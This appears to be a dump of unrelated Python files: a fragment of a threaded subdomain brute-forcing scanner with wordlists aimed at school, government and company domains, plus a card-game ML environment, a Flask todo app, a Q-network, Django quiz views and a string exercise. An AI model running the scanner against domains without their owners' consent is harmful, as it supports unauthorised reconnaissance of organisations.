Input==0:\n return os.getcwd().replace(\"module\",\"dict\\subnames.txt\")\n elif Input==1:\n return os.getcwd()+\"\\dict\\subnames_school.txt\"\n elif Input==2:\n return os.getcwd().replace(\"module\",\"dict\\subnames_gov.txt\")\n elif Input==3:\n return os.getcwd().replace(\"module\",\"dict\\subnames_company.txt\")\n elif \"Linux\" in systeminfo:\n print(os.getcwd())\n if Input==0:\n return os.getcwd().replace(\"module\",\"dict/subnames.txt\")\n elif Input==1:\n return os.getcwd()+\"/dict/subnames_school.txt\"\n elif Input==2:\n return os.getcwd().replace(\"module\",\"dict/subnames_gov.txt\")\n elif Input==3:\n return os.getcwd().replace(\"module\",\"dict/subnames_company.txt\") \n else:\n return Input \n#判断网站使用的是http或者https\ndef httpOrHttps(protocol):\n if protocol==\"https\":\n protocol=\"https\"\n else:\n protocol=\"http\"\n return protocol\n\n#将字符串设定为统一长度\ndef setStr2SameLen(length,string,fillStr=\" \"):\n if length>len(string):\n length=length-len(string)\n for i in range(length):\n string=string+fillStr\n return string\n else:\n return string\n#将数据打印在表格里的表头效果如下\n''' >title1<\n>---t1_len----< >---t1_len----<\n URL | Start Time | Profile | Speed | ID\n---------------------------------+----------------------+---------------------+---------+------------------------------------------\nhttps://www.baidu.com\n\n>-------ti----------<\n\n相关参数控制效果如图所示\n'''\n#t1_len 输出固定长度=2*t1_len+len(title1),title标题\ndef setSheetTitle(t1_len=0,title1=0,t2_len=0,title2=0,t3_len=0,title3=0,t4_len=0,title4=0,t5_len=0,title5=0,color='white'):\n #此时输出一个表格\n if t1_len!=0 and t2_len == 0:\n space_1= setStr2SameLen(t1_len,\"\",\" \")\n len1 = 2*t1_len + len(title1)\n space1 = setStr2SameLen(len1,\"\",\"-\") #空白部分用\"-\"来填充\n msg = space_1 +str(title1) + space_1 +str(\"|\")\n below = space1 + str(\"+\") # 输出-----------------+使其看着更像一个表格\n if color != \"white\":\n print(msg)\n print(below)\n else:\n printc.printf(msg,color)\n printc.printf(below,color)\n\n #此时输出两个表格\n elif t2_len!=0 and t3_len == 0:\n space_1 = setStr2SameLen(t1_len,\"\",\" \")\n space_2 = setStr2SameLen(t2_len,\"\",\" \")\n msg = space_1 + str(title1) + space_1 +str(\"|\") + space_2 + str(title2) + space_2 \n len1 = 2*t1_len + len(title1)\n space1 = setStr2SameLen(len1,\"\",\"-\") + str(\"+\")\n len2 = 2*t2_len + len(title2)\n space2 = setStr2SameLen(len2,\"\",\"-\")\n below = space1 + space2\n if color == \"white\":\n print(msg)\n print(below)\n else:\n printc.printf(msg,color)\n printc.printf(below,color)\n #此时输出三个表格\n elif t3_len!=0 and t4_len == 0:\n space_1 = setStr2SameLen(t1_len,\"\",\" \")\n space_2 = setStr2SameLen(t2_len,\"\",\" \")\n space_3 = setStr2SameLen(t3_len,\"\",\" \")\n # space_4 = setStr2SameLen(t4_len,\"\",\" \")\n msg = space_1 + str(title1) + space_1 +str(\"|\") + space_2 + str(title2) + space_2 + str(\"|\")+ space_3 + str(title3) + space_3\n len1 = 2*t1_len + len(title1)\n space1 = setStr2SameLen(len1,\"\",\"-\") + str(\"+\")\n len2 = 2*t2_len + len(title2)\n space2 = setStr2SameLen(len2,\"\",\"-\") + str(\"+\")\n len3 = 2*t3_len + len(title3)\n space3 = setStr2SameLen(len3,\"\",\"-\")\n below = space1 + space2 + space3\n if color == \"white\":\n print(msg)\n print(below)\n else:\n printc.printf(msg,color)\n printc.printf(below,color)\n #此时输出四个表格\n elif t4_len!=0 and t5_len == 0:\n space_1 = setStr2SameLen(t1_len,\"\",\" \")\n space_2 = setStr2SameLen(t2_len,\"\",\" \")\n space_3 = setStr2SameLen(t3_len,\"\",\" \")\n space_4 = setStr2SameLen(t4_len,\"\",\" \")\n msg = space_1 + str(title1) + space_1 + str(\"|\") + space_2 + str(title2) + space_2 + str(\"|\")+ space_3 + str(title3) + space_3 + str(\"|\") + space_4 + str(title4) +space_4\n len1 = 2*t1_len + len(title1)\n space1 = setStr2SameLen(len1,\"\",\"-\") + str(\"+\")\n len2 = 2*t2_len + len(title2)\n space2 = setStr2SameLen(len2,\"\",\"-\") + str(\"+\")\n len3 = 2*t3_len + len(title3)\n space3 = setStr2SameLen(len3,\"\",\"-\") + str(\"+\")\n len4 = 2*t4_len + len(title4)\n space4 = setStr2SameLen(len4,\"\",\"-\")\n below = space1 + space2 + space3 +space4\n if color == \"white\":\n print(msg)\n print(below)\n else:\n printc.printf(msg,color)\n printc.printf(below,color)\n #此时输出五个表格\n elif t5_len!=0:\n space_1 = setStr2SameLen(t1_len,\"\",\" \")\n space_2 = setStr2SameLen(t2_len,\"\",\" \")\n space_3 = setStr2SameLen(t3_len,\"\",\" \")\n space_4 = setStr2SameLen(t4_len,\"\",\" \")\n space_5 = setStr2SameLen(t5_len,\"\",\" \")\n msg = space_1 + str(title1) + space_1 + str(\"|\") + space_2 + str(title2) + space_2 + str(\"|\")+ space_3 + str(title3) + space_3 + str(\"|\") + space_4 + str(title4) +space_4 + str(\"|\") + space_5 + str(title5) + space_5\n len1 = 2*t1_len + len(title1)\n space1 = setStr2SameLen(len1,\"\",\"-\") + str(\"+\")\n len2 = 2*t2_len + len(title2)\n space2 = setStr2SameLen(len2,\"\",\"-\") + str(\"+\")\n len3 = 2*t3_len + len(title3)\n space3 = setStr2SameLen(len3,\"\",\"-\") + str(\"+\")\n len4 = 2*t4_len + len(title4)\n space4 = setStr2SameLen(len4,\"\",\"-\") + str(\"+\")\n len5 = 2*t5_len + len(title5)\n space5 = setStr2SameLen(len5,\"\",\"-\")\n below = space1 + space2 + space3 +space4 + space5\n if color == \"white\":\n print(msg)\n print(below)\n else:\n printc.printf(msg,color)\n printc.printf(below,color)\n\n''' >title1<\n>---t1_len----< >---t1_len----<\n URL | Start Time | Profile | Speed | ID\n---------------------------------+----------------------+---------------------+---------+------------------------------------------\nhttps://www.baidu.com\n\n>-------ti----------<\n\n相关参数控制效果如图所示\n'''\n#将数据打印在一个表格里面,ti_len 参数控制表格的长度(ti_len*2+len(title)),titlei参数空控制标题的内容\ndef print2sheet(t1_len=0,t1=0,title1=0,t2_len=0,t2=0,title2=0,t3_len=0,t3=0,title3=0,t4_len=0,t4=0,title4=0,t5_len=0,t5=0,title5=0,color='white'):\n #此时输出一个表格,并且要与上面表格标题对齐\n if t1_len!=0 and t2_len == 0:\n len1 = 2*t1_len + len(title1)\n space_1 = setStr2SameLen(len1,t1,\" \") + \"|\"\n msg = space_1 \n if color == \"white\":\n print(msg)\n else:\n printc.printf(msg,color)\n #此时输出两个表格\n elif t2_len!=0 and t3_len == 0:\n len1 = 2*t1_len + len(title1)\n space_1 = setStr2SameLen(len1,t1,\" \") + \"|\"\n len2 = 2*t2_len + len(title2)\n space_2 = setStr2SameLen(len2,t2,\" \") \n msg = space_1 + space_2\n if color == \"white\":\n print(msg)\n else:\n printc.printf(msg,color)\n #此时输出三个表格\n elif t3_len!=0 and t4_len == 0:\n len1 = 2*t1_len + len(title1)\n space_1 = setStr2SameLen(len1,t1,\" \") + \"|\"\n len2 = 2*t2_len + len(title2)\n space_2 = setStr2SameLen(len2,t2,\" \") + \"|\"\n len3 = 2*t3_len + len(title3)\n space_3 = setStr2SameLen(len3,t3,\" \") \n msg = space_1 + space_2 + space_3\n if color == \"white\":\n print(msg)\n else:\n printc.printf(msg,color)\n #此时输出四个表格\n elif t4_len!=0 and t5_len == 0:\n len1 = 2*t1_len + len(title1)\n space_1 = setStr2SameLen(len1,t1,\" \") + \"|\"\n len2 = 2*t2_len + len(title2)\n space_2 = setStr2SameLen(len2,t2,\" \") + \"|\"\n len3 = 2*t3_len + len(title3)\n space_3 = setStr2SameLen(len3,t3,\" \") + \"|\"\n len4 = 2*t4_len + len(title4)\n space_4 = setStr2SameLen(len4,t4,\" \") \n msg = space_1 + space_2 + space_3 + space_4\n if color == \"white\":\n print(msg)\n else:\n printc.printf(msg,color)\n #此时输出五个表格\n elif t5_len!=0:\n len1 = 2*t1_len + len(title1)\n space_1 = setStr2SameLen(len1,t1,\" \") + \"|\"\n len2 = 2*t2_len + len(title2)\n space_2 = setStr2SameLen(len2,t2,\" \") + \"|\"\n len3 = 2*t3_len + len(title3)\n space_3 = setStr2SameLen(len3,t3,\" \") + \"|\"\n len4 = 2*t4_len + len(title4)\n space_4 = setStr2SameLen(len4,t4,\" \") + \"|\"\n len5 = 2*t5_len + len(title5)\n space_5 = setStr2SameLen(len5,t5,\" \")\n msg = space_1 + space_2 + space_3 + space_4 + space_5\n if color == \"white\":\n print(msg)\n else:\n printc.printf(msg,color)\n\n#获取子域名\ndef getSubdomainName(nThreads,Num,domain,protocol):\n global count\n start_time=time.time()\n add=dicJudgeByInput(Num)\n subdomains=GetQueue(content2List(add))\n ThreadList=[]\n for i in range(0, nThreads):\n t = getSubdomainNames(subdomains,domain,protocol)\n ThreadList.append(t)\n for t in ThreadList:\n t.start()\n for t in ThreadList:\n t.join()\n msg1=\"[+] Time cost:\"+str(time.time()-start_time)+\" s\"\n msg2=\"[+] {count} Subdomains have been found\".format(count=count)\n printc.printf(msg1,\"green\")\n printc.printf(msg2,\"green\")\nif __name__=='__main__':\n write2file()\n # getSubdomainName(300,1,\"ncu.edu.cn\",\"http\")\n #bingRequests(\"site:ncu.edu.cn\")\n #delUseless(\"D:\\\\Github\\\\scan\\\\dict\\\\subnames_school.txt\")\n\n","sub_path":"module/tool.py","file_name":"tool.py","file_ext":"py","file_size_in_byte":16343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"161153366","text":"from triaddeck import TriadDeck\nfrom triadgame import TriadGame, TriadGameState, TriadMod\nfrom tqdm import tqdm\nimport random\n\n###############################################################################\n# Game session for ML training\n# - observation: getState()\n# - take action: step()\n#\n\nclass TriadGameSession():\n def __init__(self):\n self.initializeGame()\n self.debug = False\n self.hasErrors = False\n\n def generateMods(self, maxMods = 4):\n numMods = random.randrange(0, maxMods + 1)\n mods = []\n blocked = []\n\n while len(mods) < numMods:\n idx = random.randrange(0, len(TriadMod.modDB))\n testMod = TriadMod.modDB[idx]\n if any(testMod.name in s for s in blocked):\n continue\n\n mods.append(testMod)\n blocked += testMod.blockedMods\n blocked.append(testMod.name)\n\n return []#mods\n\n def initializeGame(self):\n self.game = TriadGame()\n self.game.mods = self.generateMods()\n self.game.opponentDeck = TriadDeck.generateDeckPlayer()\n self.game.playerDeck = TriadDeck.generateDeckPlayer()\n self.game.playerDeck.makeAllVisible()\n\n for mod in self.game.mods:\n mod.onMatchStart(self.game)\n\n self.game.cacheCaptureConditions()\n self.game.state = TriadGameState.PlayerTurn if (random.random() < 0.5) else TriadGameState.OpponentTurn\n self.game.onTurnStart()\n\n def getAvailPositions(self):\n if (self.game.forcedBoardIdx >= 0):\n return [ self.game.forcedBoardIdx ]\n\n availPos = []\n for i in range(len(self.game.owner)):\n if (self.game.owner[i] == 0):\n availPos.append(i)\n\n return availPos\n\n def getAvailCards(self):\n if (self.game.forcedCardIdx >= 0):\n return [ self.game.forcedCardIdx ]\n\n deck = self.game.playerDeck if (self.game.state == TriadGameState.PlayerTurn) else self.game.opponentDeck\n availCardIndices = []\n for i in range(5):\n if deck.hasCard(i):\n availCardIndices.append(i)\n\n return availCardIndices\n\n def getAvailActions(self):\n listCards = self.getAvailCards()\n listPos = self.getAvailPositions()\n\n if (len(listCards) > 0 and len(listPos) > 0):\n return [(itCard + (itPos * 5)) for itPos in listPos for itCard in listCards]\n return []\n\n def getMaxActions(self):\n return 5 * 9\n\n def getCardState(self, cardInfo):\n # [ available, known, type or 0, meta type, meta sides 0..3 (will be = to sides if known), avg power, meta rarirty ]\n # meta: avail, known, type or 0, avg power, meta rarity\n state = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n metaState = [ 0, 0, 0, 0, 0 ]\n\n if cardInfo[0] == 1:\n cardMeta = cardInfo[3]\n state = [1, cardInfo[1], 0, cardMeta.typePct, cardMeta.sides[0], cardMeta.sides[1], cardMeta.sides[2], cardMeta.sides[3], cardMeta.avgPower, cardMeta.rarity]\n if cardInfo[2] != None:\n state[2] = cardInfo[2].cardType\n metaState = [1, cardInfo[1], state[2], cardMeta.avgPower, cardMeta.rarity]\n\n return state, metaState\n\n def getState(self):\n state = []\n useDefenceValues = True\n\n # precalc values\n moveOwnerId = TriadGame.ownerPlayer if self.game.state == TriadGameState.PlayerTurn else TriadGame.ownerOpponent\n oppOwnerId = -moveOwnerId\n deckMove = self.game.playerDeck if self.game.state == TriadGameState.PlayerTurn else self.game.opponentDeck\n deckOpp = self.game.opponentDeck if self.game.state == TriadGameState.PlayerTurn else self.game.playerDeck\n cardInfoMove = deckMove.getCardsInfo()\n cardInfoOpp = deckOpp.getCardsInfo()\n\n defenceMove = None\n defenceOpp = None\n if useDefenceValues:\n defenceMove, defenceOpp = self.evalDefences(moveOwnerId, oppOwnerId, cardInfoMove, cardInfoOpp)\n\n # one-hot: active modifiers\n allGameMods = [mod.name for mod in TriadMod.modDB]\n activeMods = [mod.name for mod in self.game.mods]\n state += [1 if (s in activeMods) else 0 for s in allGameMods]\n # value of type modes\n state += self.game.typeMod\n\n # one-hot: valid board placement\n if self.game.forcedBoardIdx >= 0:\n state += [1 if (pos == self.game.forcedBoardIdx) else 0 for pos in range(len(self.game.owner))]\n else:\n state += [1 if (ownerId == 0) else 0 for ownerId in self.game.owner]\n\n # one-hot: valid cards for move's owner\n if self.game.forcedCardIdx >= 0:\n state += [1 if (cardIdx == self.game.forcedCardIdx) else 0 for cardIdx in range(5)]\n else:\n state += [1 if (cardState != TriadDeck.cardNone) else 0 for cardState in deckMove.state]\n\n metaState = state.copy()\n\n # board cells: [ relative ownerId, type, sides 0..3, defence eval..]\n # meta cell: [ relative ownerId, type, avg sides, defence evals in 0.25 increments]\n for pos in range(len(self.game.owner)):\n cellInfo = [0, 0, 0, 0, 0, 0]\n metaInfo = [0, 0, 0]\n if self.game.owner[pos] != 0:\n cardOb = self.game.board[pos]\n cellInfo = [1 if self.game.owner[pos] == moveOwnerId else -1, cardOb.cardType, cardOb.sides[0], cardOb.sides[1], cardOb.sides[2], cardOb.sides[3]]\n metaInfo = [cellInfo[0], cellInfo[1], (cardOb.sides[0] + cardOb.sides[1] + cardOb.sides[2] + cardOb.sides[3]) / 4]\n\n state += cellInfo\n metaState += metaInfo\n if useDefenceValues:\n state += defenceMove[pos]\n state += defenceOpp[pos]\n for defIdx in range(len(defenceMove[pos])):\n metaState.append(int(defenceMove[pos][defIdx] * 4) / 4)\n metaState.append(int(defenceOpp[pos][defIdx] * 4) / 4)\n\n # card data for move owner & opponent\n for i in range(5):\n cardMS, cardMM = self.getCardState(cardInfoMove[i])\n cardOS, cardOM = self.getCardState(cardInfoOpp[i])\n state += cardMS\n state += cardOS\n metaState += cardMM\n metaState += cardOM\n\n return state, metaState\n\n def evalSlotDefenceForOwner(self, pos, ownerId, oppCardsInfo, numOppCards):\n numValues = 0\n capturingCards = [ False ] * len(oppCardsInfo)\n capturingMetas = [ False ] * len(oppCardsInfo)\n\n for side,neiPos in TriadGame.cachedNeis[pos]:\n if self.game.owner[neiPos] == 0:\n numValues += self.game.findCapturingWeakness(pos, side)\n for cardIdx in range(len(oppCardsInfo)):\n if oppCardsInfo[cardIdx][0] == 1:\n if not capturingCards[cardIdx] and (oppCardsInfo[cardIdx][1] == 1):\n capturingCards[cardIdx] = self.game.canCaptureWithCard(pos, oppCardsInfo[cardIdx][2], side)\n if not capturingMetas[cardIdx]:\n capturingMetas[cardIdx] = self.game.canCaptureWithMeta(pos, oppCardsInfo[cardIdx][3], side)\n\n numOppCards = max(1, numOppCards)\n pctCardsKnown = sum(1 for i in capturingCards if i) / numOppCards\n pctCardsMeta = sum(1 for i in capturingMetas if i) / numOppCards\n return [1 - (numValues / 40), pctCardsKnown, pctCardsMeta]\n\n def evalDefences(self, moveOwnerId, oppOwnerId, moveCardsInfo, oppCardsInfo):\n # data for board cell:\n # - avg defence if owned or 0 (side defence: num values that can capture it directly)\n # - % of cards in opposing deck that can capture it directly\n # - as above, but using meta card values\n\n resultMove = [[0, 0, 0]] * len(self.game.board)\n resultOpp = [[0, 0, 0]] * len(self.game.board)\n\n totalPlaced = sum(self.game.mapPlaced)\n isFinished = totalPlaced >= len(self.game.board)\n if isFinished:\n return resultMove, resultOpp\n\n numMoveCards = sum(1 for info in moveCardsInfo if info[0] == 1)\n numOppCards = sum(1 for info in oppCardsInfo if info[0] == 1)\n\n for pos in range(len(self.game.board)):\n if self.game.owner[pos] == moveOwnerId:\n resultMove[pos] = self.evalSlotDefenceForOwner(pos, moveOwnerId, oppCardsInfo, numOppCards)\n elif self.game.owner[pos] == oppOwnerId:\n resultOpp[pos] = self.evalSlotDefenceForOwner(pos, oppOwnerId, moveCardsInfo, numMoveCards)\n\n return resultMove, resultOpp\n\n def playRandomMove(self):\n actions = self.getAvailActions()\n if len(actions) == 0:\n self.hasErrors = True\n if self.debug:\n self.game.showState('ERROR!')\n print('Avail cards:',self.getAvailCards())\n print('Avail board:',self.getAvailPositions())\n return\n\n action = random.choice(actions)\n\n cardIdx = action % 5\n boardPos = int(action / 5)\n placed = False\n if (self.game.state == TriadGameState.OpponentTurn):\n placed = self.game.placeCardFromDeck(boardPos, cardIdx, TriadGame.ownerOpponent)\n if not placed:\n self.hasErrors = True\n if self.debug:\n self.game.showState('ERROR!')\n print('Avail cards:',self.getAvailCards())\n print('Avail board:',self.getAvailPositions())\n return\n else:\n placed = self.game.placeCardFromDeck(boardPos, cardIdx, TriadGame.ownerPlayer)\n\n if placed:\n self.getState()\n self.game.onTurnStart()\n\n def playRandomGame(self):\n while not self.isFinished() and not self.hasErrors:\n if self.debug:\n self.game.showState('step')\n self.playRandomMove()\n\n if not self.hasErrors and self.debug:\n self.game.showState('done')\n\n def isFinished(self):\n return (self.game.state == TriadGameState.GameWin) or (self.game.state == TriadGameState.GameDraw) or (self.game.state == TriadGameState.GameLose)\n\n def step(self, action):\n cardIdx = action % 5\n boardPos = int(action / 5)\n if self.debug:\n print('step: requesting card:%i at %i' % (cardIdx, boardPos))\n\n placed = self.game.placeCardFromDeck(boardPos, cardIdx, TriadGame.ownerPlayer)\n done = self.isFinished()\n\n if placed:\n reward = self.game.getNumByOwner(TriadGame.ownerPlayer)\n if not done:\n self.game.onTurnStart()\n if self.debug:\n print('step: play random move, turn:',str(self.game.state))\n self.playRandomMove()\n else:\n reward = -10\n\n state = self.getState()\n return state, reward, done\n\n\n##############################################################################\n# test me\n\ndef runTestPlayRandomGames(numGames, reproSeed):\n if reproSeed < 0:\n print('Running',numGames,'random test games...')\n\n for i in tqdm(range(numGames)):\n seed = random.randrange(999999)\n random.seed(seed)\n session = TriadGameSession()\n session.seed = seed\n\n if reproSeed < 0:\n session.playRandomGame()\n else:\n seed = reproSeed\n session.hasErrors = True\n\n if session.hasErrors:\n random.seed(seed)\n session = TriadGameSession()\n session.debug = True\n session.game.debug = True\n session.playRandomGame()\n if session.hasErrors:\n print('Repro seed:',seed)\n else:\n print('FIXED')\n break\n\ndef runTestBoardState(reproSeed):\n seed = reproSeed\n if (reproSeed < 0):\n seed = random.randrange(999999)\n random.seed(seed)\n\n session = TriadGameSession()\n for i in range(3):\n session.playRandomMove()\n session.game.showState('3 moves, seed:%i' % (seed))\n\n defenceBlue, defenceRed = session.evalDefences(\n TriadGame.ownerPlayer, TriadGame.ownerOpponent,\n session.game.playerDeck.getCardsInfo(),\n session.game.opponentDeck.getCardsInfo())\n\n print('Defence blue:', defenceBlue)\n print('Defence red:', defenceRed)\n\n #print('State:',session.getState())\n\nif __name__ == \"__main__\":\n runTestPlayRandomGames(100000, reproSeed=-1)\n #runTestBoardState(reproSeed=-1)\n","sub_path":"ml/gamelogic/triadsession.py","file_name":"triadsession.py","file_ext":"py","file_size_in_byte":12567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"335344273","text":"from flask import Flask, render_template, request, redirect\nfrom flask_sqlalchemy import SQLAlchemy\nfrom datetime import datetime\nfrom werkzeug.utils import secure_filename\n\nimport os\n\napplication= Flask(__name__)\napplication.config['SQLALCHEMY_DATABASE_URI'] = \"sqlite:///todo.db\"\napplication.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napplication.config['UPLOAD_FOLDER1'] = \"/Users/sandy/FLASK2021/uploads\"\napplication.config['UPLOAD_FOLDER2'] = \"/Users/sandy/FLASK2021/uploads2\"\ndb = SQLAlchemy(application)\n\nclass Todo(db.Model):\n sno = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(200), nullable=False)\n desc = db.Column(db.String(500), nullable=False)\n date_created = db.Column(db.DateTime, default=datetime.utcnow)\n\n def __repr__(self) -> str:\n return f\"{self.sno} - {self.title}\"\n\ncounter = 1\n\n\n\n@application.route('/', methods=['GET', 'POST'])\ndef hello_world():\n if request.method=='POST':\n title = request.form['title']\n desc = request.form['desc']\n todo = Todo(title=title, desc=desc)\n db.session.add(todo)\n db.session.commit()\n \n allTodo = Todo.query.all() \n return render_template('index.html', allTodo=allTodo)\n\n@application.route('/show')\ndef products():\n allTodo = Todo.query.all()\n print(allTodo)\n return 'this is products page'\n\n@application.route('/update/', methods=['GET', 'POST'])\ndef update(sno):\n if request.method=='POST':\n title = request.form['title']\n desc = request.form['desc']\n todo = Todo.query.filter_by(sno=sno).first()\n todo.title = title\n todo.desc = desc\n db.session.add(todo)\n db.session.commit()\n return redirect(\"/\")\n \n todo = Todo.query.filter_by(sno=sno).first()\n return render_template('update.html', todo=todo)\n\n@application.route('/delete/')\ndef delete(sno):\n todo = Todo.query.filter_by(sno=sno).first()\n db.session.delete(todo)\n db.session.commit()\n return redirect(\"/\")\n\n\n\n@application.route(\"/uploader\" , methods=['GET', 'POST'])\ndef uploader():\n \n global counter\n \n\n if (counter < 3):\n if request.method=='POST':\n f = request.files['file1']\n f.save(os.path.join(application.config['UPLOAD_FOLDER1'], secure_filename(f.filename)))\n counter += 1\n return str(counter)\n return \"Uploaded successfully!\"\n else:\n if request.method=='POST':\n f = request.files['file1']\n f.save(os.path.join(application.config['UPLOAD_FOLDER2'], secure_filename(f.filename)))\n return \"Uploaded successfully!\"\n\n\n\nif __name__ == \"__main__\":\n application.run(debug=True, port=8000)\n\n","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"336483654","text":"\n\n\n\nclass QNetwork( nn.Module ) :\n\n def __init__( self, state_size, action_size, fc1_size, fc2_size ) :\n super( QNetwork, self ).__init__()\n\n self.fc1 = nn.Linear( state_size, fc1_size )\n self.fc2 = nn.Linear( fc1_size, fc2_size )\n self.fc3 = nn.Linear( fc2_size, action_size )\n\n def forward( self, s ) :\n # Outputs a vector with all Q-values\n # for all actions possible\n x = F.relu( self.fc1( s ) )\n x = F.relu( self.fc2( x ) )\n return self.fc3( x )","sub_path":"tutorials/drl_in_a_hurry/_script.py","file_name":"_script.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"611215275","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, Http404, HttpResponseRedirect\n\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom rest_framework import status\n\nfrom .models import Play\nfrom .serializer import PlaySerializer\n\nfrom quiz_questions.models import QuestionAnswers\n\nimport json\n\n# Create your views here.\n@api_view(['GET','POST'])\ndef get_or_add_play(request):\n try:\n if request.method == 'GET':\n obj = Play.objects.all()\n serializer = PlaySerializer(obj, many=True)\n return Response(serializer.data)\n elif request.method == 'POST':\n data = {\n 'user_name': request.POST.get('user_name'),\n 'quiz': request.POST.get('quiz')\n }\n serializer = PlaySerializer(data=data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n except Quiz.DoesNotExist as e:\n return Response({\"message\":\"Data doesn't exists.\"}, status=status.HTTP_200_OK)\n except Exception as e:\n return Response({\"message\": e}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n\n\n@api_view(['GET'])\ndef get_play_details(request,pid):\n try:\n if request.method == 'GET':\n obj = Play.objects.get(id=pid)\n serializer = PlaySerializer(obj)\n return Response(serializer.data)\n \n except Play.DoesNotExist as e:\n return Response({\"message\":\"Data doesn't exists.\"}, status=status.HTTP_200_OK)\n except Exception as e:\n return Response({\"message\": e}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n\n\n@api_view(['POST'])\ndef submit_quiz(request,pid):\n try:\n if request.method == 'POST': \n score = 0\n for item in request.data['quiz_questions']:\n qid = item['que_id']\n ans = item['answer']\n\n que_obj = QuestionAnswers.objects.get(id=qid)\n if ans.lower() == que_obj.right_answer.lower():\n score += que_obj.marks\n \n if score > 0:\n obj = Play.objects.get(id=pid)\n print(obj)\n data = {'user_name':obj.user_name, 'score': score, 'quiz': obj.quiz.id}\n serializer = PlaySerializer(obj, data=data)\n\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n except Play.DoesNotExist as e:\n return Response({\"message\":\"Data doesn't exists.\"}, status=status.HTTP_200_OK)\n except Exception as e:\n return Response({\"message\": e}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n\n\n","sub_path":"quiz_project/play_quiz/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"98115525","text":"# -*- coding: utf-8 -*-\n# @Time : 2019/3/5 11:59\n# @Author : lemon_huahua\n# @Email : 204893985@qq.com\n# @File : task_0305.py\n\nstr='我的是名字是lemon,今年5岁。'\n# 数字:5\n# 中文:我的名字是、今年、岁\n# 拼音:lemon\n# 符号:,。 请编写程序实现该词法分析功能。\n\ndef analysis(s):\n number=[]#存储数字的列表\n ch=[]#存储中文的列表\n en=[]#存储英文的列表\n sign=[]#存储符号的列表\n #\n for item in s:\n if item.isdigit():#判断是否是数字\n number.append(item)\n elif item.isalpha():#判断是否是字母或者是汉字\n if item.encode().isalpha():\n en.append(item)\n else:\n ch.append(item)\n else:\n sign.append(item)\n\n print('数字:',number)\n print('中文:',ch)\n print('英文:',en)\n print('字符:',sign)\n\nanalysis(str)\n# print('i'.isalpha())\n# print('我'.isalpha())\n# print('i'.encode().isalpha())\n# print('我'.encode().isalpha())\n\n\n\n\n\n","sub_path":"week_4/class_0305/task_0305.py","file_name":"task_0305.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}